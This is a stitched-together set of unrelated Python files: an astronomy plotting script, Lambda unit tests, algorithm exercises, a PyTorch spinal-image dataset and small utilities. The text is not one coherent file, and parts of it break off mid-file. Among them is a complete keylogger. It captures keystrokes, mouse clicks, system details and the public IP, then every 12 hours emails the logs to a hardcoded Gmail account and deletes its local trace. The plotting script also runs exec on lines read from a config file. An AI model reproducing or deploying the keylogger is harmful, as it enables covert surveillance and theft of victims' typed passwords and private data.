The order is given as an array of 3 positive integers. order[0] is the distance from the customer's home to the store in meters, order[1] is the time by which the customer will be ready to receive the delivery in minutes, and order[2] is the number of minutes they are willing to wait.
[input] array.array.integer shoppers
Each element of this array represents a shopper. For each shopper three positive integers are stored in the exact given order: their distance from the shop in meters, their speed in meters per minute and the estimated time they will spend in the store in minutes.
[output] array.boolean
For each shopper return if they should take the order or not."""
def delivery(order, shoppers):
    """Decide, for each shopper, whether they should take the order.

    A shopper should take it only if their total fulfillment time lands in
    the window [ready_time, ready_time + max_wait]: arriving earlier leaves
    them idle, arriving later exceeds what the customer will tolerate.

    Args:
        order: [distance store->customer (m), minutes until customer is
               ready, minutes the customer is willing to wait past that].
        shoppers: list of [distance shopper->store (m), speed (m/min),
               minutes spent inside the store].

    Returns:
        list of bool, one entry per shopper, in the same order.
    """
    cust_distance, ready_time, max_wait = order
    latest = ready_time + max_wait
    verdicts = []
    for shop_distance, speed, shop_minutes in shoppers:
        total_time = (shop_distance + cust_distance) / speed + shop_minutes
        # Bug fix: the original used `total_time < latest`, rejecting a
        # delivery that arrives at exactly ready_time + max_wait, although
        # the customer is willing to wait exactly that long.
        verdicts.append(ready_time <= total_time <= latest)
    return verdicts
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#############################################################################################
# #
# ccd_plot_history.py: create various history plots for warm pixels and warm columns #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# Last update: Mar 02, 2021 #
# #
#############################################################################################
import os
import sys
import re
import string
import random
import operator
#
#--- pylab plotting routine related modules
#
import matplotlib as mpl
if __name__ == '__main__':
mpl.use('Agg')
from pylab import *
import matplotlib.pyplot as plt
import matplotlib.font_manager as font_manager
import matplotlib.lines as lines
#
#--- read the house-keeping directory list; each line has the form
#--- "<quoted path> : <variable name>" and is turned into a module-level
#--- variable (e.g. data_dir, web_dir) via exec below
#
path = '/data/mta/Script/ACIS/Bad_pixels/house_keeping/dir_list_py'
with open(path, 'r') as f:
    data = [line.strip() for line in f.readlines()]
for ent in data:
    atemp = re.split(':', ent)
    var  = atemp[1].strip()
    line = atemp[0].strip()
    # NOTE(review): exec on file contents -- assumes the house-keeping file
    # is trusted; a malformed/hostile line would execute arbitrary code
    exec("%s = %s" %(var, line))
#
#--- append a path to a private folder to python directory
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
#--- converTimeFormat contains MTA time conversion routines
#
import mta_common_functions as mcf
#
#--- set color list (one color per panel, indexed by panel number)
#
colorList = ('blue', 'green', 'red', 'aqua', 'lime', 'fuchsia', 'maroon', 'black', 'yellow', 'olive')
#-------------------------------------------------------------------------------------------
#--- plot_ccd_history: plotting warm pixel history ---
#-------------------------------------------------------------------------------------------
def plot_ccd_histories():
    """
    plotting ccd histories
    input:  none, but reads from:
                <data_dir><ctype><ccd>_cnt          (per-ccd counts)
                <data_dir>front_side_<ctype>_cnt    (combined front-side ccds)
            where <ctype> is one of: ccd, hccd, col
    output: <web_dir>Plots/hist_plot_<ctype><ccd>.png
            <web_dir>Plots/hist_<ctype>_plot_front_side.png
    """
    categories = ['ccd', 'hccd', 'col']
    titles     = ['Warm Pixels', 'Hot Pixels', 'Warm Columns']
    subtitles  = ['Real Warm', 'Real Hot', 'Real Warm']
#
#--- one pass per data type (warm pixel / hot pixel / warm column)
#
    for idx, category in enumerate(categories):
#
#--- individual ccds 0 through 9
#
        for ccd in range(10):
            ifile = data_dir + category + str(ccd) + '_cnt'
            ofile = web_dir + 'Plots/hist_plot_' + category + str(ccd) + '.png'
            plot_each_data(ifile, ofile, titles[idx], subtitles[idx], 'CCD' + str(ccd))
#
#--- combined front-side ccds
#
        ifile = data_dir + 'front_side_' + category + '_cnt'
        ofile = web_dir + 'Plots/hist_' + category + '_plot_front_side.png'
        plot_each_data(ifile, ofile, titles[idx], subtitles[idx], 'Front Side CCDs')
#-------------------------------------------------------------------------------------------
#-- plot_each_data: create a plot for each data ---
#-------------------------------------------------------------------------------------------
def plot_each_data(ifile, ofile, part1, part2, part3):
    """
    create a four-panel history plot for one data file
    input:  ifile --- input data file name
            ofile --- output plot file name in png
            part1 --- title fragment: quantity name (e.g. 'Warm Pixels')
            part2 --- title fragment: 'real' qualifier for the potential panel
            part3 --- title fragment: ccd description (e.g. 'CCD3')
    output: ofile --- png plot
    """
#
#--- read data: per-panel ranges plus the x/y data lists
#
    xmin_list, xmax_list, ymin_list, ymax_list, x_list, y_list = readData(ifile)
    xmin = min(xmin_list)
    xmax = max(xmax_list)
#
#--- one title per panel (cumulative / daily / persisting / potential)
#
    titles = [
        'Cumulative Numbers of ' + part1 + ': ' + part3,
        'Numbers of Daily ' + part1 + ': ' + part3,
        'Numbers of Persisting ' + part1 + ': ' + part3,
        'Numbers of Potential ' + part1 + ' (' + part2 + ' + Flickering): ' + part3,
    ]
#
#--- plotting: create the stacked panel plot
#
    plotPanel(xmin, xmax, ymin_list, ymax_list, x_list, y_list, 'Time (Year)', 'Counts',
              titles, ofile, mksize=0.0, lwidth=1.5)
#---------------------------------------------------------------------------------------------------
#--- readData: read data and set plotting range ---
#---------------------------------------------------------------------------------------------------
def readData(dataname):
    """
    read data and set plotting range for each of the four quantities
    input:  dataname --- data file name (need a full path to the file)
    output: a list of six parallel lists, one entry per quantity
            (cumulative, daily, persisting, potential counts):
            [xmin_list, xmax_list, ymin_list, ymax_list, x_list, y_list]
    """
#
#--- read data
#
    data = mcf.read_data_file(dataname)
    xval = []
    cval = []
    dval = []
    bval = []
    pval = []
    prev = 0
    for ent in data:
        atemp = re.split('<>', ent)
        try:
            val = float(atemp[0])
            if val < 0:
                continue
            if val == prev:                 #--- skip duplicated time stamps
                continue
#
#--- parse all count columns BEFORE appending anything, so a malformed
#--- line cannot leave xval longer than the count lists
#
            val1 = float(atemp[2])
            val2 = float(atemp[3])
            val3 = float(atemp[4])
            val4 = float(atemp[5])
            stime = int(float(val))
            ytime = mcf.chandratime_to_fraq_year(stime)
            xval.append(ytime)
            cval.append(val1)
            dval.append(val2)
            bval.append(val3)
            pval.append(val3 + val4)
#
#--- bug fix: prev was previously set to ytime (fractional year) but
#--- compared against val (seconds from 1998.1.1), so the duplicate
#--- check never fired after the first row; store the raw time instead
#
            prev = val
        except:
            pass
#
#-- find plotting ranges and make a list of data lists
#
    xmin_list = []
    xmax_list = []
    ymin_list = []
    ymax_list = []
    x_list = []
    y_list = []
    for dlist in (cval, dval, bval, pval):
        (xmin, xmax, ymin, ymax) = findPlottingRange(xval, dlist)
        xmin_list.append(xmin)
        xmax_list.append(xmax)
        ymin_list.append(ymin)
        ymax_list.append(ymax)
        x_list.append(xval)
        y_list.append(dlist)
    return [xmin_list, xmax_list, ymin_list, ymax_list, x_list, y_list]
#---------------------------------------------------------------------------------------------------
#--- findPlottingRange: setting plotting range ---
#---------------------------------------------------------------------------------------------------
def findPlottingRange(xval, yval):
"""
setting plotting range
input: xval --- an array of x-axis
yval --- an array of y-axis
output: xmin --- the lower boundary of x axis plotting range
xmax --- the upper boundary of x axis plotting range
ymin --- the lower boundary of y axis plotting range
ymax --- the upper boundary of y axis plotting range
"""
#
#--- set ploting range.
#
xmin = min(xval)
xmax = max(xval)
xdff = xmax - xmin
xmin -= 0.1 * xdff
if xmin < 0.0:
xmin = 0
xmax += 0.1 * xdff
#
#--- since there is a huge peak during the first year, avoid that to set y plotting range
#
ytemp = []
for i in range(0, len(yval)):
if xval[i] < 2001.4986301: #--- 2001:182:00:00:00
continue
ytemp.append(yval[i])
ymin = min(ytemp)
ymax = max(ytemp)
ydff = ymax - ymin
if ydff == 0:
ymin = 0
if ymax == 0:
ymax = 2
else:
ymin -= 0.1 * ydff
if ymin < 0.0:
ymin = 0
ymax += 0.1 * ydff
ymin = int(ymin)
ymax = int(ymax) + 2
return(xmin, xmax, ymin, ymax)
#---------------------------------------------------------------------------------------------------
#--- plotPanel: plots multiple data in separate panels ---
#---------------------------------------------------------------------------------------------------
def plotPanel(xmin, xmax, yMinSets, yMaxSets, xSets, ySets, xname, yname, entLabels, ofile, mksize=1.0, lwidth=1.5):
    """
    This function plots multiple data sets, one per stacked panel.
    input:  xmin, xmax  --- shared x plotting range for all panels
            yMinSets    --- a list of ymin, one per panel
            yMaxSets    --- a list of ymax, one per panel
            xSets       --- a list of lists containing x-axis data
            ySets       --- a list of lists containing y-axis data
            xname       --- x-axis label (shown on the bottom panel only)
            yname       --- y-axis label (shown on every panel)
            entLabels   --- a list of the names/titles of each data set;
                            its length sets the number of panels
            ofile       --- output file name
            mksize      --- a size of marker
            lwidth      --- a line width
    output: ofile       --- a png plot
    """
#
#--- close all opened plot
#
    plt.close('all')
#
#---- set a few parameters
#
    mpl.rcParams['font.size'] = 9
    props = font_manager.FontProperties(size=9)
    plt.subplots_adjust(hspace=0.08)
    tot = len(entLabels)
#
#--- start plotting each data
#
    for i in range(0, len(entLabels)):
        # axis objects are created through exec with generated names ax0,
        # ax1, ...; in CPython this works because exec writes into the dict
        # returned by locals(), which the later eval() call also reads
        axNam = 'ax' + str(i)
#
#--- setting the panel position (subplot spec like "311", "312", ...)
#
        j = i + 1
        if i == 0:
            line = str(tot) + '1' + str(j)
        else:
            line = str(tot) + '1' + str(j) + ', sharex=ax0'
            # NOTE(review): the line below immediately overwrites the
            # ', sharex=ax0' version above, so the panels are NOT actually
            # x-axis-linked -- presumably a workaround for exec/locals scoping;
            # confirm before removing either line
            line = str(tot) + '1' + str(j)
        exec("%s = plt.subplot(%s)" % (axNam, line))
        exec("%s.set_autoscale_on(False)" % (axNam))
        exec("%s.set_xbound(xmin ,xmax)" % (axNam))
        exec("%s.set_xlim(left=%s, right=%s, auto=False)" % (axNam, str(xmin), str(xmax)))
        exec("%s.set_ylim(bottom=%s, top=%s, auto=False)" % (axNam, str(yMinSets[i]), str(yMaxSets[i])))
        xdata = xSets[i]
        ydata = ySets[i]
#
#---- actual data plotting
#
        p, = plt.plot(xdata, ydata, color=colorList[i], marker='.', markersize=mksize, lw = lwidth)
#
#--- add legend
#
        leg = legend([p], [entLabels[i]], prop=props, loc=2)
        leg.get_frame().set_alpha(0.5)
        exec("%s.set_ylabel(yname, size=8)" % (axNam))
#
#--- add x ticks label only on the last panel
#
    for i in range(0, tot):
        ax = 'ax' + str(i)
        if i != tot-1:
            # hide tick labels on every panel except the bottom one
            line = eval("%s.get_xticklabels()" % (ax))
            for label in line:
                label.set_visible(False)
        else:
            pass
    xlabel(xname)
#
#--- set the size of the plotting area in inch (width: 10.0in, height 2.08in x number of panels)
#
    fig = matplotlib.pyplot.gcf()
    height = (2.00 + 0.08) * tot
    fig.set_size_inches(10.0, height)
#
#--- save the plot in png format
#
    plt.savefig(ofile, format='png', dpi=200)
#--------------------------------------------------------------------
if __name__ == '__main__':
plot_ccd_histories()
|
import json
import pytest
import operator
from client import app
from unittest import mock
from typing import NamedTuple
class Message(NamedTuple):
    """Minimal stand-in for an SQS message: a body plus a no-op delete()."""
    body: dict

    def delete(self):
        # Mimics sqs.Message.delete(); always reports success.
        return True
@pytest.fixture()
def lambda_event():
    """Bare-bones API Gateway event with an empty body."""
    return dict(body={})
@pytest.fixture()
def message_data():
    """A Message whose body is a JSON-encoded 'sum 2+3' request."""
    payload = json.dumps({'function': 'sum', 'args': [2, 3]})
    return Message(payload)
@mock.patch("client.app.process")
@mock.patch("client.app.receive_message")
def test_handler(mock_receive_message, mock_process, lambda_event, message_data):
    """lambda_handler returns 200 and echoes function/args/result."""
    mock_receive_message.return_value = message_data
    mock_process.return_value = (10, None)
    response = app.lambda_handler(lambda_event, '')
    assert response["statusCode"] == 200
    payload = json.loads(response["body"])
    for key in ("function", "args", "result"):
        assert key in payload.keys()
def test_get_data(message_data):
    """get_data decodes the message body into (function, args)."""
    func_name, args = app.get_data(message_data)
    assert (func_name, args) == ('sum', [2, 3])
@pytest.mark.parametrize('func_name, expected_function', [
    ('sum', operator.add),
    ('subtract', operator.sub),
    ('divide', operator.truediv),
    ('multiply', operator.mul),
])
def test_get_function(func_name, expected_function):
    """Each supported name maps to the matching operator callable."""
    assert app.get_function(func_name) == expected_function
@mock.patch("boto3.resource")
def test_get_queue(mock_boto):
    """get_queue looks up the fifo queue on the boto3 sqs resource."""
    sqs_resource = mock_boto.return_value
    sqs_resource.get_queue_by_name.return_value = 'newton_queue'
    assert app.get_queue() == 'newton_queue'
    mock_boto.assert_called_once_with('sqs')
    sqs_resource.get_queue_by_name.assert_called_once_with(QueueName='newton_sqs.fifo')
@mock.patch("client.app.get_queue")
def test_receive_message(mock_get_queue):
    """receive_message returns the single message pulled off the queue."""
    queue = mock_get_queue.return_value
    queue.receive_messages.return_value = [{'message': 1}]
    assert app.receive_message() == {'message': 1}
    mock_get_queue.assert_called_once_with()
    queue.receive_messages.assert_called_once_with(MaxNumberOfMessages=1)
@mock.patch("uuid.uuid4")
@mock.patch("client.app.dynamodb")
def test_process(mock_dynamo, mock_uuid):
    """process computes the result and persists it to DynamoDB."""
    mock_uuid.return_value = 'uuid-1234'
    assert app.process('sum', [1, 2]) == (3, None)
    mock_dynamo.Table.assert_called_once_with('queue_results')
    expected_item = {
        'ResultID': 'uuid-1234',
        'function': 'sum',
        'args': [1, 2],
        'result': 3
    }
    mock_dynamo.Table().put_item.assert_called_once_with(Item=expected_item)
|
from f_com import F_Com
from f_ro import Random_Oracle_and_Chan
from prot_com import Commitment_Prot
import commsg
|
"""
剑指 Offer 57 - II. 和为s的连续正数序列
输入一个正整数 target ,输出所有和为 target 的连续正整数序列(至少含有两个数)。
序列内的数字由小到大排列,不同序列按照首个数字从小到大排列。
"""
"""
还是使用双指针,左右指针中间的数列和等于target。
题目要求,序列里边至少含有两个数,所以比方说target=9,那么这个数列最多到5,否则5+6最少就是11,由此可以定数列范围。
然后用不同大小的窗口从左到右滑动,最小窗口大小为2,最大为整个序列,不过当sum()>target时,退出循环迭代。
这个题竟然是简单难度,莫非是因为有暴力破解的方法所以才是简单难度吗。
"""
def findContinuousSequence(target: int) -> list:
    """Return all runs of >=2 consecutive positive ints summing to target.

    Brute-force sliding window: grow the window length and test every start
    position; the window sum is evaluated with the arithmetic-series formula
    instead of sum() to keep each test O(1).
    """
    candidates = [n for n in range(1, target // 2 + 2)]
    result = []
    width = 1
    while sum(candidates[:width]) < target:
        for start in range(len(candidates) - width):
            # sum of the (width+1) consecutive ints starting at start+1
            window_sum = (start + 1 + start + width + 1) * (width + 1) / 2
            if window_sum == target:
                result.append(candidates[start:start + width + 1])
        width += 1
    return sorted(result, key=lambda seq: seq[0])
"""
上边的方法是肯定能跑出来的,但是这个方法更接近于暴力破解,在复杂度上并不占优势,所以还得说网上的大神是真的大神,共提出三种犯法,分别是:
滑动窗口->枚举求根法->间隔法,这三个方法,后两个方法都关系到数学计算,所以说编程编到最后会发现其实还是数学。就好像物理学到最后还是数学,物理学家数学都好。。。
"""
def findContinuousSequence2(target: int) -> list:
    """Two-pointer version: expand the right end while the window sum falls
    short of target, shrink from the left when it overshoots; record the
    window whenever the sum matches exactly."""
    nums = list(range(1, target // 2 + 2))
    lo, hi = 0, 1
    result = []
    while hi < len(nums):
        # arithmetic-series sum of nums[lo..hi] (values lo+1 .. hi+1)
        window_sum = (lo + hi + 2) * (hi - lo + 1) / 2
        if window_sum < target:
            hi += 1
        elif window_sum > target:
            lo += 1
        else:
            result.append(nums[lo:hi + 1])
            lo += 1
    return result
def findContinuousSequence3(target: int) -> list:
    """Closed-form version: for a window of length l, the first term must be
    x = target/l + 1/2 - l/2 (from the arithmetic-series sum formula); keep
    the window whenever x works out to a positive integer. l starts at 2 and
    is bounded by sqrt(2*target), so no scan over start positions is needed.
    """
    nums = [n for n in range(1, target // 2 + 2)]
    result = []
    length = 2
    while length * length < 2 * target:
        first = target / length + 0.5 - 0.5 * length
        if first > 0 and first // 1 == first:
            start = int(first) - 1
            result.append(nums[start:start + length])
        length += 1
    return sorted(result, key=lambda seq: seq[0])
if __name__ == '__main__':
res = findContinuousSequence3(9)
print(res) |
from pynput import keyboard
from pynput import mouse
from requests import get
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import platform
import time
import random
import os
import smtplib
import datetime
glob_log_file = ''
def set_log_file_name(): # Set the name of the log file
log_file = 'D:\Workspace\Python\Keylogger'
charlen = 15
chars = 'abcdefghijklmnopqrstuvwxyz0123456789'
name = ''
while charlen > 0:
name += chars[random.randint(0, 35)]
charlen -= 1
log_file += '\\'+name+'.txt'
return log_file
def init_log_file(): # Function to initialize the log file with system information
log_file = set_log_file_name()
lfile = open(log_file, 'a')
ip = get('https://api.ipify.org').text
lfile.write('OS Name : '+platform.system()+'\n')
lfile.write('OS Version : '+platform.version()+'\n')
lfile.write('OS Release : '+platform.release()+'\n')
lfile.write('Machine Type : '+platform.machine()+'\n')
lfile.write('Processor : '+platform.processor()+'\n')
lfile.write('Network Name : '+platform.node()+'\n')
lfile.write('IP Address : '+ip+'\n')
lfile.close()
return log_file
def send_email(log_file): # Function to send an email
fromaddr = "logthekeysbuddy@gmail.com"
toaddr = "logthekeysbuddy@gmail.com"
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Keystroke Logs"
body = ""
msg.attach(MIMEText(body, 'plain'))
filename = 'log.txt'
attachment = open(log_file, "rb")
p = MIMEBase('application', 'octet-stream')
p.set_payload((attachment).read())
encoders.encode_base64(p)
p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
msg.attach(p)
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(fromaddr, "logthekeys_123")
text = msg.as_string()
s.sendmail(fromaddr, toaddr, text)
s.quit()
def keypress(Key): # Callback for Keypress - Opens the logfile and records the keystrokes
lfile = open(glob_log_file,'a')
lfile.write(str(datetime.datetime.now()) + ' ' + str(Key) + '\n')
lfile.close()
def on_click(x, y, button, pressed): # Callback for Mouse Click - Opens the logfile and records the mouse clicks
string = ''
lfile = open(glob_log_file,'a')
if pressed:
string = string + 'Pressed at ' + str(x) + ',' + str(y)
lfile.write(str(datetime.datetime.now()) + ' ' + string + '\n')
else:
string = string + 'Released at ' + str(x) + ',' + str(y)
lfile.write(str(datetime.datetime.now()) + ' ' + string + '\n')
lfile.close()
while True:
log_file = init_log_file()
glob_log_file = log_file
klistener = keyboard.Listener(on_press=keypress) # Initialize Keyboard Listener
mlistener = mouse.Listener(on_click=on_click) # Initialize the Mouse Listener
klistener.start()
mlistener.start()
time.sleep(43200) # Sleep for 12 hours while recording the keystrokes
klistener.stop()
mlistener.stop()
send_email(log_file) # Send the log file as a mail after stopping the listeners
os.remove(log_file) # Remove the file
|
import numpy as np
class DataProcessor():
    """Feature-engineering helpers: bias column, log-compression of heavy
    tails, polynomial augmentation, z-score normalization, and a
    train/validation split."""

    def __init__(self):
        pass

    def _add_bias(self, x):
        # Prepend a constant column of ones (the bias term).
        bias = np.ones((x.shape[0], 1))
        return np.concatenate([bias, x], 1)

    def _normalize(self, x):
        # Standardize columns 1..14 and 92..end to zero mean / unit std.
        columns = list(range(1, 15)) + list(range(92, x.shape[1]))
        for col in columns:
            mu = np.mean(x[:, col])
            sigma = np.std(x[:, col])
            x[:, col] = (x[:, col] - mu) / sigma
        return x

    def _augment(self, x):
        # Append powers 2..6 of columns 1..14 as extra features.
        for col in range(1, 15):
            for power in range(2, 7):
                extra = np.power(x[:, col], power).reshape(-1, 1)
                x = np.concatenate([x, extra], axis=1)
        return x

    def _take_log(self, x):
        # Compress values above e in columns 1..14 (except column 2) with
        # log(x) + e - 1, which is continuous at x == e.
        e = np.exp(1)
        for dim in range(1, 15):
            if dim == 2:
                continue
            mask = x[:, dim] > e
            x[:, dim][mask] = np.log(x[:, dim][mask]) + e - 1
        return x

    def augment_features(self, train_x):
        # Pipeline order matters: bias -> log -> polynomial -> normalize.
        train_x = self._add_bias(train_x)
        train_x = self._take_log(train_x)
        train_x = self._augment(train_x)
        train_x = self._normalize(train_x)
        return train_x

    def cut_validation(self, train_x, train_y, proportion=0.9):
        # Split off the trailing (1 - proportion) fraction for validation.
        split = int(train_x.shape[0] * proportion)
        return (train_x[:split], train_y[:split],
                train_x[split:], train_y[split:])
|
# -*- coding: utf-8 -*-
from __future__ import print_function, division
import random
import os
import torch
import pandas as pd
from skimage import io, transform
import numpy as np
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
import cv2
from torchvision import transforms, utils
import scipy.io as scio
class SpinalDataset(Dataset):
    """Spinal Landmarks dataset.

    Args:
        csv_file: csv whose first column holds image file names.
        img_dir: directory containing the images.
        landmark_dir: directory containing '<image name>.mat' landmark files.
        transform: optional callable applied to each sample dict.
        rgb: if True, convert the cv2 BGR image to RGB.
    """
    def __init__(self, csv_file, img_dir, landmark_dir, transform=None, rgb=True):
        self.landmarks_frame = pd.read_csv(csv_file)
        self.img_dir = img_dir
        self.landmark_dir = landmark_dir
        print(len(self.landmarks_frame))
        self.transform = transform
        self.rgb = rgb

    def __len__(self):
        return len(self.landmarks_frame)

    def __getitem__(self, idx):
        # Bug fix: pandas .ix was removed in pandas 1.0; use positional .iloc.
        img_name = os.path.join(self.img_dir, self.landmarks_frame.iloc[idx, 0])
        landmarks_name = os.path.join(self.landmark_dir, self.landmarks_frame.iloc[idx, 0] + '.mat')
        image = cv2.imread(img_name)
        if self.rgb:
            image = image[..., ::-1]    # cv2 loads BGR; flip to RGB
        # Bug fix: the np.float alias was removed in NumPy 1.24; the builtin
        # float is the documented equivalent.
        land_data = scio.loadmat(landmarks_name)['p2'].astype(float)
        # swap columns: stored as (x, y), kept internally as (y, x)
        landmarks = np.empty(land_data.shape)
        landmarks[:, 0] = land_data[:, 1]
        landmarks[:, 1] = land_data[:, 0]
        shapes = np.asarray(image.shape[0:2])
        sample = {'image': image, 'landmarks': landmarks, 'shapes': shapes}
        if self.transform:
            sample = self.transform(sample)
        return sample
class Rescale(object):
    """Rescale the image in a sample to a given size.

    Args:
        output_size (int or tuple): Desired output size. If a tuple, the
            output is matched to it exactly; if an int, the smaller image
            edge is matched to it and the aspect ratio is preserved.
    """

    def __init__(self, output_size):
        assert isinstance(output_size, (int, tuple))
        self.output_size = output_size

    def __call__(self, sample):
        image, landmarks = sample['image'], sample['landmarks']
        h, w = image.shape[:2]
        if isinstance(self.output_size, int):
            # match the shorter edge, preserving aspect ratio
            if h > w:
                new_h, new_w = self.output_size * h / w, self.output_size
            else:
                new_h, new_w = self.output_size, self.output_size * w / h
        else:
            new_h, new_w = self.output_size
        new_h = int(new_h)
        new_w = int(new_w)
        resized = cv2.resize(image, (new_w, new_h))
        # landmarks are stored (y, x), so scale by (new_h/h, new_w/w)
        scaled = landmarks * [new_h / h, new_w / w]
        return {'image': resized, 'landmarks': scaled, 'shapes': sample['shapes']}
class RandomCrop(object):
    """Crop randomly the image in a sample.

    Args:
        output_size (tuple or int): Desired output size. If int, square crop
            is made.
    """

    def __init__(self, output_size):
        assert isinstance(output_size, (int, tuple))
        if isinstance(output_size, int):
            self.output_size = (output_size, output_size)
        else:
            assert len(output_size) == 2
            self.output_size = output_size

    def __call__(self, sample):
        image, landmarks = sample['image'], sample['landmarks']
        h, w = image.shape[:2]
        new_h, new_w = self.output_size
        # Bug fix: np.random.randint's upper bound is exclusive, so the
        # original randint(0, h - new_h) raised "low >= high" whenever the
        # crop size equalled the image size and could never place the crop
        # flush with the bottom/right edge. Use an inclusive upper bound.
        top = np.random.randint(0, h - new_h + 1)
        left = np.random.randint(0, w - new_w + 1)
        image = image[top: top + new_h,
                      left: left + new_w]
        # landmarks are stored (y, x), so shift by (top, left)
        landmarks = landmarks - [top, left]
        return {'image': image, 'landmarks': landmarks, 'shapes': sample['shapes']}
class SmartRandomCrop(object):
    """Crop the image to the landmarks' bounding box enlarged by zoom_scale.

    Despite the name, the crop is currently deterministic: the randomized
    rectangle selection is commented out and the padded bounding box is
    used directly.

    Args:
        zoom_scale (int or float): factor by which the landmark bounding box
            is enlarged (clamped to the image borders).
    """

    def __init__(self, zoom_scale=3):
        assert isinstance(zoom_scale, (int, float))
        self.zoom_scale = zoom_scale

    def get_random_rect(self, min_x, min_y, max_x, max_y, w, h):
        # Pad each side by half of (zoom_scale - 1) times the box extent,
        # clamped to the image borders.
        pad_x = (max_x - min_x) * (self.zoom_scale - 1) / 2.0
        pad_y = (max_y - min_y) * (self.zoom_scale - 1) / 2.0
        return (max(min_x - pad_x, 0), max(min_y - pad_y, 0),
                min(max_x + pad_x, w), min(max_y + pad_y, h))

    def __call__(self, sample):
        image, landmarks = sample['image'], sample['landmarks']
        h, w = image.shape[:2]
        lo = np.min(landmarks, axis=0)
        hi = np.max(landmarks, axis=0)
        # NOTE(review): landmark column 0 is treated as x and column 1 as y
        # here, which is the opposite of the (y, x) convention used by the
        # other transforms -- confirm against the dataset before relying on it
        x0, y0, x1, y1 = self.get_random_rect(lo[0], lo[1], hi[0], hi[1], w, h)
        cropped = image[int(y0):int(y1), int(x0):int(x1)]
        shifted = landmarks - [x0, y0]
        return {'image': cropped, 'landmarks': shifted, 'shapes': sample['shapes']}
class ToTensor(object):
    """Convert ndarrays in a sample to Tensors: image HWC uint8 -> CHW float
    in [0, 1]; landmarks (y, x) -> flat vector normalized by (H, W)."""

    def __call__(self, sample):
        image, land = sample['image'], sample['landmarks']
        chw = image.transpose((2, 0, 1))   # HWC -> CHW
        norm = np.empty(land.shape)
        norm[:, 0] = land[:, 0] / chw.shape[1]   # y / H
        norm[:, 1] = land[:, 1] / chw.shape[2]   # x / W
        flat = norm.reshape(-1)
        return {'image': torch.from_numpy(chw).float().div(255),
                'landmarks': torch.from_numpy(flat).float(),
                'shapes': sample['shapes']}
class RandomFlip(object):
    """Horizontally flip image and landmarks with probability 0.5."""

    def __call__(self, sample):
        image, landmarks = sample['image'], sample['landmarks']
        if random.random() < 0.5:
            image = cv2.flip(image, 1)
            # mirror the x coordinate (stored in landmark column 1)
            landmarks[:, 1] = image.shape[1] - landmarks[:, 1]
        return {'image': image, 'landmarks': landmarks, 'shapes': sample['shapes']}
class Normalize(object):
    """In-place per-channel standardization: (channel - mean) / std."""

    def __init__(self, mean, std):
        self.mean = mean
        self.std = std

    def __call__(self, sample):
        img = sample['image']
        for channel, m, s in zip(img, self.mean, self.std):
            channel.sub_(m).div_(s)
        sample['image'] = img
        return sample
class SwapChannels(object):
    """Reorder the channel axis of an HWC image.

    Args:
        swaps (int triple): final order of channels, e.g. (2, 1, 0).
    """

    def __init__(self, swaps):
        self.swaps = swaps

    def __call__(self, image):
        """Return *image* with channels taken in ``self.swaps`` order.

        Args:
            image: HWC array (or tensor supporting fancy channel indexing).
        """
        return image[:, :, self.swaps]
class RandomLightingNoise(object):
    """With probability 2/3 (randint(0,2) truthy), apply a random channel
    permutation to the image."""

    def __init__(self):
        self.perms = ((0, 1, 2), (0, 2, 1),
                      (1, 0, 2), (1, 2, 0),
                      (2, 0, 1), (2, 1, 0))

    def __call__(self, sample):
        img = sample['image']
        if random.randint(0, 2):
            order = self.perms[random.randint(0, len(self.perms) - 1)]
            img = SwapChannels(order)(img)   # shuffle channels
        sample['image'] = img
        return sample
class RandomContrast(object):
    """With probability 2/3, scale pixel values in place by a random factor
    drawn uniformly from [lower, upper]. Expects a float image."""

    def __init__(self, lower=0.5, upper=1.5):
        self.lower = lower
        self.upper = upper
        assert self.upper >= self.lower, "contrast upper must be >= lower."
        assert self.lower >= 0, "contrast lower must be non-negative."

    def __call__(self, sample):
        if random.randint(0, 2):
            factor = random.uniform(self.lower, self.upper)
            sample['image'] *= factor
        return sample
class RandomBrightness(object):
    """With probability 2/3, shift pixel values in place by a random delta
    drawn uniformly from [-delta, delta]."""

    def __init__(self, delta=32):
        assert 0.0 <= delta <= 255.0
        self.delta = delta

    def __call__(self, sample):
        img = sample['image']
        if random.randint(0, 2):
            shift = random.uniform(-self.delta, self.delta)
            # casting="unsafe" lets the float shift be added to uint8 images
            np.add(img, shift, out=img, casting="unsafe")
        sample['image'] = img
        return sample
if __name__ == '__main__':
datapath = '/home/felix/data/AASCE/boostnet_labeldata/'
transform_train = transforms.Compose([
Rescale((256,128)),
RandomFlip(),
RandomLightingNoise(),
ToTensor(),
#Normalize([ 0.225, 0.225, 0.225,], [ 0.153, 0.153, 0.153,]),
])
trainset = SpinalDataset(
csv_file = datapath + '/labels/training/filenames.csv', transform=transform_train,
img_dir = datapath + '/data/training/', landmark_dir = datapath + '/labels/training/')
sam = random.sample(range(480), 10)
for m in range(10):
num = sam[m]
sample = trainset[num]
image = sample['image'].data.numpy()
landmark = sample['landmarks'].data.numpy()
landmark = landmark.reshape(-1, 2)
img = np.uint8(np.transpose(image, (1,2,0))*255)
assert np.max(img)<=255
assert np.min(img)>=0
for i in range(68):
img = cv2.circle(img,(int(landmark[i][1]*128),int(landmark[i][0]*256)),1,(255,0,0))
cv2.imwrite('imshow{a}.png'.format(a=num),img)
print(m)
|
from setuptools import setup
setup(name = "gnconvertor",
version = "0.1",
description = "Convert between geeknote and cleartext/orgmode format",
author = "Pieter Vercammen",
author_email = "email@someplace.com",
url = "whatever",
packages = ['geeknoteConvertor', 'tests'],
scripts = ["gnconvertor"],
long_description = """Convert between geeknote and cleartext/orgmode format""",
test_suite = "tests.suite.buildTestSuite"
)
|
import numpy as np
from typing import Union
from rltools.tabular_solution_methods.mab import GradientBandit, SimpleBandit
def k_armed_testbed(bandit: Union[SimpleBandit, GradientBandit],
                    it: int,
                    time_steps: int,
                    **kwargs):
    """Run *it* independent k-armed bandit experiments and return the
    reward curve averaged over runs.

    Each run draws fresh true action values q ~ N(0, 1) and 1000 reward
    samples per arm, builds a new bandit of the same class as *bandit*,
    and records its learning curve.

